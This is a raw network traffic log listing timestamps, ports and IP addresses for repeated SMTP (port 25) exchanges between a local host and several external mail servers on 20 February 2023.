Feb 20, 2023 09:50:46.241601944 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.241904974 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.241961002 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.244363070 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.244719982 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.268172026 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.268457890 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.268610954 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.268635035 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.268865108 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.268973112 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.269098043 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.269587994 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.271527052 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.271821022 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.294991016 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.295161963 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.295363903 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.295480013 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.295613050 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.295727968 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.298537016 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.298721075 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.321749926 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.321991920 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.322237015 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.322335958 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.322391987 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.322568893 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.325546980 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.325826883 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.331722021 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.332117081 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.348676920 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.348984957 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.349026918 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.349073887 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.349246979 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.349420071 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.352653980 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.352874994 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.375653028 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.375854969 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.375924110 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.375976086 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.376061916 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.376182079 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.379740000 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.379998922 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.394169092 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.394643068 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.402508020 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.402595043 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.402777910 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.403003931 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.403029919 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.403189898 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.406927109 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.407196999 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.429615974 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.429663897 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.429734945 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.429897070 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.430169106 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.430243015 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.434000969 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.434262037 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.456615925 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.456764936 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.456789017 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.456868887 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.457125902 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.457174063 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.457392931 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.457751989 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.461638927 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.461850882 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.483434916 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.483640909 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.483654976 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.483704090 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.483772993 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.483824015 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.488740921 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.488914013 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.510292053 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.510344982 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.510364056 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.510529041 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.510746956 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.510829926 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.515826941 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.516015053 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.520432949 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.520837069 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.537012100 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.537296057 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.537328005 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.537342072 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.537524939 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.537746906 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.542781115 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.543015957 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.564008951 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.564065933 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.564222097 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.564342022 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.564640045 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.564743042 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.569886923 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.570158958 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.583775043 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.584341049 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.590912104 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.591147900 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.591157913 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.591208935 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.591334105 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.591485023 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.597002029 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.597213030 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.617882967 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.617929935 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.617959023 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.618067026 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.618202925 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.618298054 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.624080896 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.624218941 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.644689083 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.644771099 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.644855976 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.644907951 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.645018101 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.645184994 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.647049904 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.647430897 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.651089907 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.651276112 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.671633959 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.671704054 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.671741962 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.671837091 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.671955109 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.672029018 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.678206921 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.678411961 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.698472977 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.698626041 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.698666096 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.698683977 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.698757887 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.698896885 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.705631018 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.705795050 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.709789991 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.710361958 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.725331068 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.725399017 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.725435972 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.725498915 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.725608110 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.725660086 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.732877016 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.733033895 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.752039909 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.752120018 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.752156973 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.752279043 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.752485991 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.752551079 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.759875059 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.760056973 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.772332907 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.772670984 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.778925896 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.779002905 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.779027939 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.779191971 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.779393911 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.779483080 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.786936045 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.787281036 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.805814028 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.805963993 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.805999994 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.806153059 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.806193113 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.806354046 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.814282894 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.814522982 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.832931042 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.833127975 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.833172083 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.833321095 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.833368063 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.833475113 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.836045027 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.836384058 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.841449022 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.841605902 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.860297918 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.860452890 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.860501051 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.860639095 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.860652924 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.860797882 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.871510983 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.871721983 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.887756109 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.887955904 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.887988091 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.888144016 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.888147116 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.888324976 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.891890049 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:46.899075985 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.899116039 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.899338007 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.899652958 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.914609909 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.914745092 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.914832115 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.914972067 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.914997101 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.915158987 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.915669918 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:46.927479982 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.927651882 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.942413092 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.942464113 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.942540884 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.942673922 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.942826033 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.942902088 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.955667973 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.955888987 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.963156939 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:46.963578939 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:46.969661951 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.969906092 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.971638918 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.971668959 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.971895933 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.972045898 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.983561993 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:46.983783007 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:46.997638941 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:46.997921944 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:46.999512911 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:46.999778986 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:46.999948978 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.000194073 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.014303923 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.014637947 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.025803089 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.026031971 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.026890039 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.027302027 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.027533054 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.027759075 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.027761936 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.027957916 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.042706966 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.042889118 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.052628994 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.052870035 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.054399014 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.054554939 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.054671049 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.054805040 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.070359945 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.070584059 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.080985069 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.081222057 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.082170963 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.082353115 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.082494020 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.082676888 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.091711044 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.092179060 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.101253986 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.101491928 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.108035088 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.108280897 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.109569073 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.109606981 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.109786034 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.110004902 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.131088018 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.131412983 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.135612965 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.135819912 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.137362003 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.137387037 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.137573957 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.137732029 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.155761957 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.156184912 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.160984993 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.161201000 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.165745974 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.165972948 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.167229891 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.167273045 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.167380095 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.167504072 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.188977003 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:47.190463066 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.190736055 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.194406033 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.194674015 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.196607113 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.196655989 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.197309017 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.197386026 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.219757080 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.220052004 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.221384048 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.221865892 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.223716021 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.223973989 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.226651907 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.226722002 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.226874113 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.227031946 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.249705076 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.249937057 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.253232956 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.253391981 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.256020069 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.256056070 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.256180048 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.256252050 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.277448893 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.277673006 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.278404951 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:47.278502941 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:47.280958891 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.281152010 CET	49709	25	192.168.2.5	142.250.102.26
